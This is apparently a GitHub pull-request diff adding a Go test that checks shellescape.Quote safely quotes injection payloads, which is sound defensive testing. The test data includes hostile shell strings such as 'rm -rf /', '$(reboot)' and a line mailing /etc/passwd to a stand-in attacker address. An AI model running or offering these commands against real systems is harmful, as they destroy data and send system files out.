Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 39 additions & 0 deletions shellescape_test.go
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,44 @@
assertEqual(t, s, expected)
}

func TestSecurityAdversarialPayloads(t *testing.T) {
tests := []struct {
name string
input string
expected string
}{
{"empty string", "", "''"},
{"command separator semicolon", "; rm -rf / ;", "'; rm -rf / ;'"},
{"command separator AND", "foo && bar", "'foo && bar'"},
{"command separator OR", "foo || bar", "'foo || bar'"},
{"pipe operator", "cat /etc/passwd | mail bad@actor.com", "'cat /etc/passwd | mail bad@actor.com'"},
{"subshell dollar parens", "$(reboot)", "'$(reboot)'"},
{"subshell backticks", "`id`", "'`id`'"},
{"nested subshell", "`echo $(whoami)`", "'`echo $(whoami)`'"},
{"variable expansion simple", "$PATH", "'$PATH'"},
{"variable expansion braced", "${HOME}", "'${HOME}'"},
{"single quote alone", "'", `''"'"''`},
{"triple single quotes", "'''", `''"'"''"'"''"'"''`},
{"nested single quotes in text", "don't say 'never'", `'don'"'"'t say '"'"'never'"'"''`},
{"double quotes in text", `"quoted"`, `'"quoted"'`},
{"mixed quotes", `'\"'`, `''"'"'\"'"'"''`},
{"newlines and tabs", "foo\nbar\tbaz", "'foo\nbar\tbaz'"},
{"wildcards and globs", "* ? [a-z] {1..10}", "'* ? [a-z] {1..10}'"},
{"redirection", "> /dev/null 2>&1", "'> /dev/null 2>&1'"},
{"process substitution", "<(ls -la)", "'<(ls -la)'"},
{"backslash paths", `C:\Program Files\App\`, `'C:\Program Files\App\'`},
{"multibyte utf8", "こんにちは世界 🚀", "'こんにちは世界 🚀'"},
}

for _, tt := range tests {
tt := tt
t.Run(tt.name, func(t *testing.T) {
got := shellescape.Quote(tt.input)
assertEqual(t, got, tt.expected)
})
}
}

func TestCleanString(t *testing.T) {
s := shellescape.Quote("foo.example.com")
expected := `foo.example.com`
Expand All @@ -80,7 +118,7 @@
args args
want string
}{
{"all ASCII printable characters", args{`"printable!" characters '' 12321312"`}, `"printable!" characters '' 12321312"`},

Check failure on line 121 in shellescape_test.go

View workflow job for this annotation

GitHub Actions / lint

string `"printable!" characters '' 12321312"` has 3 occurrences, make it a constant (goconst)
{"some non printable characters", args{"print\u0081ble"}, "printble"},
}
for _, tt := range tests {
Expand Down Expand Up @@ -108,6 +146,7 @@
{"only spaces", args{" "}, ""},
}
for _, tt := range tests {
tt := tt
t.Run(tt.name, func(t2 *testing.T) {
t2.Parallel()
got := shellescape.StripSpaces(tt.args.s)
Expand Down